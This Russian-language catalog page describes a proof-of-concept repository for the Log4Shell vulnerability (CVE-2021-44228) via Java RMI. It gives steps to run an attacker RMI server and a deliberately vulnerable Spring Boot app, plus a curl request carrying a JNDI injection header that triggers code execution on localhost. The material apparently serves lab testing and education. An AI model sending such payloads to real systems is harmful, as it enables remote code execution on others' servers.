Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4shell-rmi-poc — Доказательство концепции уязвимостей Log4j (CVE-2021-44228) через Java-RMI | Kitploit
Инструменты/GitHubGitHub/labout/log4shell-rmi-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHublabout/log4shell-rmi-poc

log4shell-rmi-poc

Доказательство концепции уязвимостей Log4j (CVE-2021-44228) через Java-RMI

Репозиторий
844 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

log4shell-rmi-poc

Доказательство концепции (Proof of Concept) уязвимости Log4j (CVE-2021-44228) через Java-RMI
Использует Log4j 2.5.7 из spring-boot-starter-log4j2

Требования:

Протестировано с Java 8 (JDK 1.8.0_25) и Java 11 (JDK 11.0.1)

Как запустить PoC

1. Клонировать репозиторий:

root@kitploit:~
git clone https://github.com/Labout/log4shell-rmi-poc.git

2. Запустить RMI-сервер злоумышленника

root@kitploit:~
cd Log4jshell_rmi_server

./mvnw clean package

java -jar target/Log4jshell.rmi.server-0.0.1-SNAPSHOT.jar

Вы должны увидеть нечто подобное:

rmi сервер

3. Запустить уязвимое Log4j-приложение (здесь это приложение Spring Boot)

В новом терминале

root@kitploit:~
cd vulnerabel_log4j_app

./mvnw clean package

java -jar target/vulnerabel_log4j_app-0.0.1-SNAPSHOT.jar

4. Внедрить уязвимый JNDI через заголовок "Accept-version"

root@kitploit:~
curl 'http://localhost:8080/hello' --header 'Accept-Version: ${jndi:rmi://127.0.0.1:1099/ExecByEL}'

Как вы можете видеть, уязвимое приложение вызывает приложение «Калькулятор».

эксплойт

Ссылки

https://www.cisecurity.org/log4j-zero-day-vulnerability-response/
https://www.lunasec.io/docs/blog/log4j-zero-day/

Скачать инструмент